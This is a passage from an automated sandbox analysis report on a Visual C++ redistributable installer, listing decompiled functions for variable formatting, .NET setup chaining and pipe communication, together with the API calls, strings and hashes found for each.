                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002547D
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 000254B1
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 000254E5
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002557B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                          • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                          • API String ID: 2944378912-2047837012
                                                                          • Opcode ID: 89adde74ae7bb587a587c0f5060df5e5ece8d3ffaf5dc8a374ef59b3873daf3f
                                                                          • Instruction ID: b2dc644951057b9440581ce89c90f0e55c30fd7a0a5a3bd140e92c4f4ce4e261
                                                                          • Opcode Fuzzy Hash: 89adde74ae7bb587a587c0f5060df5e5ece8d3ffaf5dc8a374ef59b3873daf3f
                                                                          • Instruction Fuzzy Hash: 8161E872E40735AAF720DAB9DD45BEFB6E9AF04742F114125FE01EB180D7748E4086E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E0001567D(struct _CRITICAL_SECTION* _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                          				signed int _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				char _v36;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _t138;
                                                                          				WCHAR* _t141;
                                                                          				intOrPtr _t143;
                                                                          				WCHAR* _t144;
                                                                          				signed short _t156;
                                                                          				signed short _t162;
                                                                          				intOrPtr _t168;
                                                                          				signed short _t169;
                                                                          				WCHAR* _t190;
                                                                          				intOrPtr _t199;
                                                                          				signed int _t215;
                                                                          				void* _t216;
                                                                          				char _t219;
                                                                          				void* _t221;
                                                                          				char _t227;
                                                                          				intOrPtr* _t228;
                                                                          				signed int _t229;
                                                                          				intOrPtr* _t237;
                                                                          				WCHAR* _t238;
                                                                          				signed int _t239;
                                                                          				WCHAR* _t240;
                                                                          				signed int _t241;
                                                                          				signed int _t242;
                                                                          				WCHAR* _t243;
                                                                          				intOrPtr _t244;
                                                                          				WCHAR* _t248;
                                                                          				WCHAR* _t249;
                                                                          				intOrPtr _t250;
                                                                          				void* _t265;
                                                                          
                                                                          				_t215 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v24 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_v36 = 0;
                                                                          				_v32 = 0;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t238 = _a8;
                                                                          				_t248 = E00011EDE( &_v16, lstrlenW(_t238) + 1);
                                                                          				_a8 = _t248;
                                                                          				if(_t248 >= 0) {
                                                                          					while(1) {
                                                                          						_push(0x5b);
                                                                          						_t216 = E0003F7CA(_t219);
                                                                          						_t221 = _t238;
                                                                          						if(_t216 == 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t12 = _t216 + 2; // 0x2
                                                                          						_push(0x5d);
                                                                          						_t138 = E0003F7CA(_t221);
                                                                          						_v40 = _t138;
                                                                          						if(_t138 == 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t219 = (_t138 - _t216 >> 1) - 1;
                                                                          						_v20 = _t219;
                                                                          						if(_t219 != 0) {
                                                                          							if(_t216 <= _t238) {
                                                                          								L12:
                                                                          								_t26 = _t216 + 2; // 0x2
                                                                          								_v28 = 0 | _a20 == 0x00000000;
                                                                          								_t249 = E00018281(_a20 == 0,  &_v12, _t26, _t219);
                                                                          								_a8 = _t249;
                                                                          								if(_t249 < 0) {
                                                                          									_push("Failed to get variable name.");
                                                                          									L7:
                                                                          									_push(_t249);
                                                                          									L8:
                                                                          									E0005012F();
                                                                          									L66:
                                                                          									_t215 = _v8;
                                                                          									goto L67;
                                                                          								}
                                                                          								_t219 = _v24;
                                                                          								_push(1);
                                                                          								_push(4 + _v8 * 4);
                                                                          								if(_t219 == 0) {
                                                                          									_t244 = E000138D4();
                                                                          									_v24 = _t244;
                                                                          									if(_t244 == 0) {
                                                                          										_t243 = 0x8007000e;
                                                                          										_t249 = 0x8007000e;
                                                                          										_a8 = 0x8007000e;
                                                                          										E000137D3(_t180, "variable.cpp", 0x4b6, 0x8007000e);
                                                                          										_push("Failed to allocate variable array.");
                                                                          										L37:
                                                                          										_push(_t243);
                                                                          										goto L8;
                                                                          									}
                                                                          									L17:
                                                                          									if(_v20 < 2) {
                                                                          										L20:
                                                                          										if(_a20 == 0) {
                                                                          											L22:
                                                                          											_t215 = _v8;
                                                                          											if(_v36 == 0) {
                                                                          												_t245 = _t244 + _t215 * 4;
                                                                          												_t249 = E00017203(_t219, _a4, _v12, _t244 + _t215 * 4);
                                                                          												_a8 = _t249;
                                                                          												if(_t249 != 0x80070490) {
                                                                          													L27:
                                                                          													_t246 = _v28;
                                                                          													L28:
                                                                          													if(_t249 < 0) {
                                                                          														_push("Failed to set variable value.");
                                                                          														goto L2;
                                                                          													}
                                                                          													_t215 = _t215 + 1;
                                                                          													_v8 = _t215;
                                                                          													_t249 = E00018260(_t246,  &_v12, L"[%d]", _t215);
                                                                          													_t265 = _t265 + 0x10;
                                                                          													_a8 = _t249;
                                                                          													if(_t249 < 0) {
                                                                          														_push("Failed to format placeholder string.");
                                                                          														goto L2;
                                                                          													}
                                                                          													_t249 = E0001823E(_t246,  &_v16, _v12, 0);
                                                                          													_a8 = _t249;
                                                                          													if(_t249 < 0) {
                                                                          														_push("Failed to append placeholder.");
                                                                          														goto L2;
                                                                          													}
                                                                          													L31:
                                                                          													_t238 = _v40 + 2;
                                                                          													continue;
                                                                          												}
                                                                          												_t190 = E000122F9(_t245, 0x5b524, 0);
                                                                          												L26:
                                                                          												_t249 = _t190;
                                                                          												_a8 = _t249;
                                                                          												goto L27;
                                                                          											}
                                                                          											_t190 = E000121A5(_t244 + _t215 * 4, L"*****", 0);
                                                                          											goto L26;
                                                                          										}
                                                                          										_t249 = E00017E13(_t219, _a4, _v12,  &_v36);
                                                                          										_a8 = _t249;
                                                                          										if(_t249 < 0) {
                                                                          											E0005012F(_t249, "Failed to determine variable visibility: \'%ls\'.", _v12);
                                                                          											goto L66;
                                                                          										}
                                                                          										goto L22;
                                                                          									}
                                                                          									_t219 = 0x5c;
                                                                          									if(_t219 !=  *((intOrPtr*)(_t216 + 2))) {
                                                                          										goto L20;
                                                                          									}
                                                                          									_t41 = _t216 + 4; // 0x4
                                                                          									_t215 = _v8;
                                                                          									_t246 = _v28;
                                                                          									_t249 = E00018281(_v28, _t244 + _t215 * 4, _t41, 1);
                                                                          									_a8 = _t249;
                                                                          									goto L28;
                                                                          								}
                                                                          								_push(_t219);
                                                                          								_t199 = E00013A72();
                                                                          								if(_t199 == 0) {
                                                                          									_t243 = 0x8007000e;
                                                                          									_t249 = 0x8007000e;
                                                                          									_a8 = 0x8007000e;
                                                                          									E000137D3(_t199, "variable.cpp", 0x4b0, 0x8007000e);
                                                                          									_push("Failed to reallocate variable array.");
                                                                          									goto L37;
                                                                          								}
                                                                          								_t244 = _t199;
                                                                          								_v24 = _t244;
                                                                          								goto L17;
                                                                          							}
                                                                          							_t249 = E0001823E(0 | _a20 == 0x00000000,  &_v16, _t238, _t216 - _t238 >> 1);
                                                                          							_a8 = _t249;
                                                                          							if(_t249 < 0) {
                                                                          								L6:
                                                                          								_push("Failed to append string.");
                                                                          								goto L7;
                                                                          							} else {
                                                                          								_t219 = _v20;
                                                                          								goto L12;
                                                                          							}
                                                                          						}
                                                                          						_t249 = E0001823E(0 | _a20 == 0x00000000,  &_v16, _t238, (_t138 - _t238 >> 1) + 1);
                                                                          						_a8 = _t249;
                                                                          						if(_t249 >= 0) {
                                                                          							goto L31;
                                                                          						}
                                                                          						goto L6;
                                                                          					}
                                                                          					_t218 = 0 | _a20 == 0x00000000;
                                                                          					_t141 = E0001823E(_a20 == 0,  &_v16, _t238, 0);
                                                                          					_t249 = _t141;
                                                                          					_a8 = _t249;
                                                                          					if(_t249 < 0) {
                                                                          						goto L6;
                                                                          					}
                                                                          					_push(_v8);
                                                                          					L0004F3D0();
                                                                          					_t240 = _t141;
                                                                          					_v32 = _t240;
                                                                          					if(_t240 != 0) {
                                                                          						_push(_v16);
                                                                          						_push(0);
                                                                          						_push(_t240);
                                                                          						L0004F3E0();
                                                                          						if(0 == 0) {
                                                                          							_t227 = 0;
                                                                          							_t241 = 0;
                                                                          							if(_v8 <= 0) {
                                                                          								L53:
                                                                          								_t242 = _v32;
                                                                          								_t156 =  &_v20;
                                                                          								_push(_t156);
                                                                          								_push(0x5b524);
                                                                          								_push(_t242);
                                                                          								_push(_t227);
                                                                          								_v20 = _t227;
                                                                          								L0004F3F0();
                                                                          								if(_t156 == 0xea || _t156 == 0) {
                                                                          									if(_a12 == 0) {
                                                                          										L64:
                                                                          										_t228 = _a16;
                                                                          										if(_t228 != 0) {
                                                                          											 *_t228 = _v20;
                                                                          										}
                                                                          										goto L66;
                                                                          									}
                                                                          									_v20 = _v20 + 1;
                                                                          									_t249 = E0001821F(_t218,  &_v12, _v20 + 1);
                                                                          									_a8 = _t249;
                                                                          									if(_t249 >= 0) {
                                                                          										_t162 =  &_v20;
                                                                          										_push(_t162);
                                                                          										_push(_v12);
                                                                          										_push(_t242);
                                                                          										_push(0);
                                                                          										L0004F3F0();
                                                                          										if(_t162 == 0) {
                                                                          											_t249 = E00018281(_t218, _a12, _v12, 0);
                                                                          											_a8 = _t249;
                                                                          											if(_t249 >= 0) {
                                                                          												goto L64;
                                                                          											}
                                                                          											_push("Failed to copy string.");
                                                                          											goto L7;
                                                                          										}
                                                                          										_t254 =  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
                                                                          										_t249 =  >=  ? 0x80004005 :  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
                                                                          										_a8 = _t249;
                                                                          										E000137D3(0x80004005, "variable.cpp", 0x508, _t249);
                                                                          										_push("Failed to format record.");
                                                                          										goto L7;
                                                                          									}
                                                                          									_push("Failed to allocate string.");
                                                                          								} else {
                                                                          									_t257 =  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
                                                                          									_t249 =  >=  ? 0x80004005 :  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
                                                                          									_a8 = _t249;
                                                                          									E000137D3(0x80004005, "variable.cpp", 0x4fe, _t249);
                                                                          									_push("Failed to get formatted length.");
                                                                          								}
                                                                          								goto L7;
                                                                          							}
                                                                          							_t168 = _v24;
                                                                          							_t229 = _v8;
                                                                          							do {
                                                                          								_t237 =  *((intOrPtr*)(_t168 + _t241 * 4));
                                                                          								_t249 = _a8;
                                                                          								if( *_t237 == 0) {
                                                                          									goto L51;
                                                                          								}
                                                                          								_push(_t237);
                                                                          								_t89 = _t241 + 1; // 0x1
                                                                          								_t169 = _t89;
                                                                          								_push(_t169);
                                                                          								_push(_v32);
                                                                          								L0004F3E0();
                                                                          								if(_t169 != 0) {
                                                                          									_t261 =  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
                                                                          									_t249 =  >=  ? 0x80004005 :  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
                                                                          									_a8 = _t249;
                                                                          									E000137D3(0x80004005, "variable.cpp", 0x4f2, _t249);
                                                                          									_push("Failed to set record string.");
                                                                          									goto L7;
                                                                          								}
                                                                          								_t168 = _v24;
                                                                          								_t229 = _v8;
                                                                          								L51:
                                                                          								_t241 = _t241 + 1;
                                                                          							} while (_t241 < _t229);
                                                                          							_t227 = 0;
                                                                          							goto L53;
                                                                          						}
                                                                          						_t264 =  <=  ? 0 : 0xffffffff80070000;
                                                                          						_t249 =  >=  ? 0x80004005 :  <=  ? 0 : 0xffffffff80070000;
                                                                          						_a8 = _t249;
                                                                          						E000137D3(0x80004005, "variable.cpp", 0x4ea, _t249);
                                                                          						_push("Failed to set record format string.");
                                                                          						goto L7;
                                                                          					}
                                                                          					_t243 = 0x8007000e;
                                                                          					_t249 = 0x8007000e;
                                                                          					_a8 = 0x8007000e;
                                                                          					E000137D3(_t141, "variable.cpp", 0x4e6, 0x8007000e);
                                                                          					_push("Failed to allocate record.");
                                                                          					goto L37;
                                                                          				} else {
                                                                          					_push("Failed to allocate buffer for format string.");
                                                                          					L2:
                                                                          					_push(_t249);
                                                                          					E0005012F();
                                                                          					L67:
                                                                          					LeaveCriticalSection(_a4);
                                                                          					_t143 = _v24;
                                                                          					if(_t143 == 0) {
                                                                          						L77:
                                                                          						_t144 = _v32;
                                                                          						if(_t144 != 0) {
                                                                          							_push(_t144);
                                                                          							L0004F3C0();
                                                                          						}
                                                                          						if(_a20 == 0) {
                                                                          							E00012793(0);
                                                                          							E00012793(_v16);
                                                                          							E00012793(_v12);
                                                                          						} else {
                                                                          							if(_v16 != 0) {
                                                                          								E000554EF(_v16);
                                                                          							}
                                                                          							if(_v12 != 0) {
                                                                          								E000554EF(_v12);
                                                                          							}
                                                                          						}
                                                                          						return _t249;
                                                                          					}
                                                                          					_t239 = 0;
                                                                          					if(_t215 == 0) {
                                                                          						L76:
                                                                          						E00013999(_t143);
                                                                          						goto L77;
                                                                          					}
                                                                          					_t250 = _t143;
                                                                          					do {
                                                                          						if(_a20 == 0) {
                                                                          							E00012793( *((intOrPtr*)(_t250 + _t239 * 4)));
                                                                          						} else {
                                                                          							if( *((intOrPtr*)(_t250 + _t239 * 4)) != 0) {
                                                                          								E000554EF( *((intOrPtr*)(_t250 + _t239 * 4)));
                                                                          							}
                                                                          						}
                                                                          						_t239 = _t239 + 1;
                                                                          					} while (_t239 < _t215);
                                                                          					_t249 = _a8;
                                                                          					_t143 = _v24;
                                                                          					goto L76;
                                                                          				}
                                                                          			}









































                                                                          0x000157e1
                                                                          0x000157eb
                                                                          0x000157ed
                                                                          0x00000000
                                                                          0x000157ed
                                                                          0x0001579f
                                                                          0x000157a0
                                                                          0x000157a7
                                                                          0x0001591e
                                                                          0x00015929
                                                                          0x00015930
                                                                          0x00015933
                                                                          0x00015938
                                                                          0x00000000
                                                                          0x00015938
                                                                          0x000157ad
                                                                          0x000157af
                                                                          0x00000000
                                                                          0x000157af
                                                                          0x00015758
                                                                          0x0001575a
                                                                          0x0001575f
                                                                          0x00015728
                                                                          0x00015728
                                                                          0x00000000
                                                                          0x00015761
                                                                          0x00015761
                                                                          0x00000000
                                                                          0x00015761
                                                                          0x0001575f
                                                                          0x0001571b
                                                                          0x0001571d
                                                                          0x00015722
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015722
                                                                          0x000158ca
                                                                          0x000158d6
                                                                          0x000158db
                                                                          0x000158dd
                                                                          0x000158e2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000158e8
                                                                          0x000158eb
                                                                          0x000158f0
                                                                          0x000158f2
                                                                          0x000158f7
                                                                          0x000159a2
                                                                          0x000159a7
                                                                          0x000159a8
                                                                          0x000159a9
                                                                          0x000159b0
                                                                          0x000159e7
                                                                          0x000159e9
                                                                          0x000159ee
                                                                          0x00015a21
                                                                          0x00015a21
                                                                          0x00015a24
                                                                          0x00015a27
                                                                          0x00015a28
                                                                          0x00015a2d
                                                                          0x00015a2e
                                                                          0x00015a2f
                                                                          0x00015a32
                                                                          0x00015a3c
                                                                          0x00015ab0
                                                                          0x00015b44
                                                                          0x00015b44
                                                                          0x00015b49
                                                                          0x00015b4e
                                                                          0x00015b4e
                                                                          0x00000000
                                                                          0x00015b49
                                                                          0x00015abb
                                                                          0x00015ac8
                                                                          0x00015aca
                                                                          0x00015acf
                                                                          0x00015adb
                                                                          0x00015ae0
                                                                          0x00015ae1
                                                                          0x00015ae4
                                                                          0x00015ae5
                                                                          0x00015ae6
                                                                          0x00015aed
                                                                          0x00015b31
                                                                          0x00015b33
                                                                          0x00015b38
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015b3a
                                                                          0x00000000
                                                                          0x00015b3a
                                                                          0x00015afa
                                                                          0x00015b04
                                                                          0x00015b12
                                                                          0x00015b15
                                                                          0x00015b1a
                                                                          0x00000000
                                                                          0x00015b1a
                                                                          0x00015ad1
                                                                          0x00015a42
                                                                          0x00015a4d
                                                                          0x00015a57
                                                                          0x00015a65
                                                                          0x00015a68
                                                                          0x00015a6d
                                                                          0x00015a6d
                                                                          0x00000000
                                                                          0x00015a3c
                                                                          0x000159f0
                                                                          0x000159f3
                                                                          0x000159f6
                                                                          0x000159f6
                                                                          0x000159fe
                                                                          0x00015a01
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015a03
                                                                          0x00015a04
                                                                          0x00015a04
                                                                          0x00015a07
                                                                          0x00015a08
                                                                          0x00015a0b
                                                                          0x00015a12
                                                                          0x00015a82
                                                                          0x00015a8c
                                                                          0x00015a9a
                                                                          0x00015a9d
                                                                          0x00015aa2
                                                                          0x00000000
                                                                          0x00015aa2
                                                                          0x00015a14
                                                                          0x00015a17
                                                                          0x00015a1a
                                                                          0x00015a1a
                                                                          0x00015a1b
                                                                          0x00015a1f
                                                                          0x00000000
                                                                          0x00015a1f
                                                                          0x000159bd
                                                                          0x000159c7
                                                                          0x000159d5
                                                                          0x000159d8
                                                                          0x000159dd
                                                                          0x00000000
                                                                          0x000159dd
                                                                          0x000158fd
                                                                          0x00015908
                                                                          0x0001590f
                                                                          0x00015912
                                                                          0x00015917
                                                                          0x00000000
                                                                          0x000156ca
                                                                          0x000156ca
                                                                          0x000156cf
                                                                          0x000156cf
                                                                          0x000156d0
                                                                          0x00015b53
                                                                          0x00015b56
                                                                          0x00015b5c
                                                                          0x00015b61
                                                                          0x00015b9c
                                                                          0x00015b9c
                                                                          0x00015ba1
                                                                          0x00015ba3
                                                                          0x00015ba4
                                                                          0x00015ba4
                                                                          0x00015bad
                                                                          0x00015bd0
                                                                          0x00015bd8
                                                                          0x00015be0
                                                                          0x00015baf
                                                                          0x00015bb3
                                                                          0x00015bb8
                                                                          0x00015bb8
                                                                          0x00015bc1
                                                                          0x00015bc6
                                                                          0x00015bc6
                                                                          0x00015bc1
                                                                          0x00015bed
                                                                          0x00015bed
                                                                          0x00015b65
                                                                          0x00015b69
                                                                          0x00015b96
                                                                          0x00015b97
                                                                          0x00000000
                                                                          0x00015b97
                                                                          0x00015b6b
                                                                          0x00015b6d
                                                                          0x00015b71
                                                                          0x00015b86
                                                                          0x00015b73
                                                                          0x00015b77
                                                                          0x00015b7c
                                                                          0x00015b7c
                                                                          0x00015b77
                                                                          0x00015b8b
                                                                          0x00015b8c
                                                                          0x00015b90
                                                                          0x00015b93
                                                                          0x00000000
                                                                          0x00015b93

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,000199BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000156A2
                                                                          • lstrlenW.KERNEL32(00000000,?,000199BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000156AC
                                                                          • _wcschr.LIBVCRUNTIME ref: 000158B4
                                                                          • LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,000199BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 00015B56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                          • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                          • API String ID: 1026845265-2050445661
                                                                          • Opcode ID: 026c7dc206d3fc087c1e7f17c130145d40f6981f904588b0ad4567a0764299d9
                                                                          • Instruction ID: 93398035f393ade6b86ff9e1a96e79658038a7acf60ebc148dbe1ee2c6eb4463
                                                                          • Opcode Fuzzy Hash: 026c7dc206d3fc087c1e7f17c130145d40f6981f904588b0ad4567a0764299d9
                                                                          • Instruction Fuzzy Hash: F0F19371D04B15EADB219FA48C41AEF7BE8EF84752F11412AFD05AF281D7349E818BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 57%
                                                                          			E0003CC24(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void*** _a12) {
                                                                          				long _v8;
                                                                          				void* __edi;
                                                                          				void* _t48;
                                                                          				void* _t50;
                                                                          				void* _t52;
                                                                          				void* _t55;
                                                                          				void* _t56;
                                                                          				void* _t57;
                                                                          				signed short _t80;
                                                                          				signed short _t84;
                                                                          				signed short _t87;
                                                                          				signed short _t90;
                                                                          				signed short _t93;
                                                                          				WCHAR* _t99;
                                                                          				void** _t108;
                                                                          				void* _t113;
                                                                          				void* _t131;
                                                                          				void* _t132;
                                                                          
                                                                          				_t98 = __ebx;
                                                                          				_v8 = 0;
                                                                          				_t108 = E000138D4(0x18, 1);
                                                                          				if(_t108 != 0) {
                                                                          					_push(__ebx);
                                                                          					_t99 = _a8;
                                                                          					_t48 = CreateEventW(0, 0, 0, _t99);
                                                                          					_t108[1] = _t48;
                                                                          					if(_t48 != 0) {
                                                                          						_t50 = E00011F20( &_v8, L"%ls_send", _t99);
                                                                          						_t132 = _t131 + 0xc;
                                                                          						if(_t50 >= 0) {
                                                                          							_t52 = CreateEventW(0, 0, 0, _v8);
                                                                          							_t108[2] = _t52;
                                                                          							if(_t52 != 0) {
                                                                          								_t113 = E00011F20( &_v8, L"%ls_mutex", _t99);
                                                                          								_t132 = _t132 + 0xc;
                                                                          								if(_t113 >= 0) {
                                                                          									_t55 = CreateMutexW(0, 1, _v8);
                                                                          									_t108[3] = _t55;
                                                                          									if(_t55 != 0) {
                                                                          										_t56 = CreateFileMappingW(0xffffffff, 0, 4, 0, 0x10000, _a4);
                                                                          										 *_t108 = _t56;
                                                                          										if(_t56 != 0) {
                                                                          											_t57 = MapViewOfFile(_t56, 2, 0, 0, 0);
                                                                          											_t108[4] = _t57;
                                                                          											if(_t57 != 0) {
                                                                          												_t113 = E00011BEA(_t57 + 0x21a, 0x104, _t99);
                                                                          												if(_t113 >= 0) {
                                                                          													 *(_t108[4]) = 0;
                                                                          													 *((char*)(_t108[4] + 0x218)) = 0;
                                                                          													 *((intOrPtr*)(_t108[4] + 4)) = 0x8000000a;
                                                                          													 *((char*)(_t108[4] + 2)) = 0;
                                                                          													 *((char*)(_t108[4] + 1)) = 0;
                                                                          													 *((char*)(_t108[4] + 0x219)) = 0;
                                                                          													 *((intOrPtr*)(_t108[4] + 8)) = 0x8000000a;
                                                                          													 *((char*)(_t108[4] + 3)) = 0;
                                                                          													 *((intOrPtr*)(_t108[4] + 0xc)) = 0;
                                                                          													 *((char*)(_t108[4] + 0x422)) = 1;
                                                                          													 *((intOrPtr*)(_t108[4] + 0x424)) = 0;
                                                                          													 *((intOrPtr*)(_t108[4] + 0x428)) = 0;
                                                                          													 *((intOrPtr*)(_t108[4] + 0x42c)) = 0;
                                                                          													ReleaseMutex(_t108[3]);
                                                                          													 *_a12 = _t108;
                                                                          													_t108 = 0;
                                                                          												} else {
                                                                          													_push("failed to copy event name to shared memory structure.");
                                                                          													goto L20;
                                                                          												}
                                                                          											} else {
                                                                          												_t80 = GetLastError();
                                                                          												_t118 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
                                                                          												_t113 =  >=  ? 0x80004005 :  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
                                                                          												E000137D3(0x80004005, "NetFxChainer.cpp", 0x43, _t113);
                                                                          												_push(_a4);
                                                                          												_push("Failed to MapViewOfFile for %ls.");
                                                                          												goto L17;
                                                                          											}
                                                                          										} else {
                                                                          											_t84 = GetLastError();
                                                                          											_t121 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
                                                                          											_t113 =  >=  ? 0x80004005 :  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "NetFxChainer.cpp", 0x3c, _t113);
                                                                          											_push(_a4);
                                                                          											_push("Failed to memory map cabinet file: %ls");
                                                                          											goto L17;
                                                                          										}
                                                                          									} else {
                                                                          										_t87 = GetLastError();
                                                                          										_t124 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                          										_t113 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "NetFxChainer.cpp", 0x34, _t113);
                                                                          										_push(_v8);
                                                                          										_push("Failed to create mutex: %ls");
                                                                          										goto L17;
                                                                          									}
                                                                          								} else {
                                                                          									_push("failed to allocate memory for mutex name");
                                                                          									goto L20;
                                                                          								}
                                                                          							} else {
                                                                          								_t90 = GetLastError();
                                                                          								_t127 =  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
                                                                          								_t113 =  >=  ? 0x80004005 :  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "NetFxChainer.cpp", 0x2d, _t113);
                                                                          								_push(_v8);
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_push("failed to allocate memory for event name");
                                                                          							L20:
                                                                          							_push(_t113);
                                                                          							E0005012F();
                                                                          						}
                                                                          					} else {
                                                                          						_t93 = GetLastError();
                                                                          						_t130 =  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
                                                                          						_t113 =  >=  ? 0x80004005 :  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "NetFxChainer.cpp", 0x27, _t113);
                                                                          						_push(_t99);
                                                                          						L8:
                                                                          						_push("Failed to create event: %ls");
                                                                          						L17:
                                                                          						_push(_t113);
                                                                          						E0005012F();
                                                                          					}
                                                                          					_pop(_t98);
                                                                          				} else {
                                                                          					_t113 = 0x8007000e;
                                                                          					E000137D3(_t47, "NetFxChainer.cpp", 0x24, 0x8007000e);
                                                                          					_push("Failed to allocate memory for NetFxChainer struct.");
                                                                          					_push(0x8007000e);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				if(_t108 != 0) {
                                                                          					if(_t108[3] != 0) {
                                                                          						ReleaseMutex(_t108[3]);
                                                                          					}
                                                                          					E0003CEF5(_t98, _t108, _t108);
                                                                          				}
                                                                          				return _t113;
                                                                          			}






















                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0003D34C,?,?,?), ref: 0003CC6A
                                                                          • GetLastError.KERNEL32(?,?,0003D34C,?,?,?), ref: 0003CC77
                                                                          • ReleaseMutex.KERNEL32(?), ref: 0003CEDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
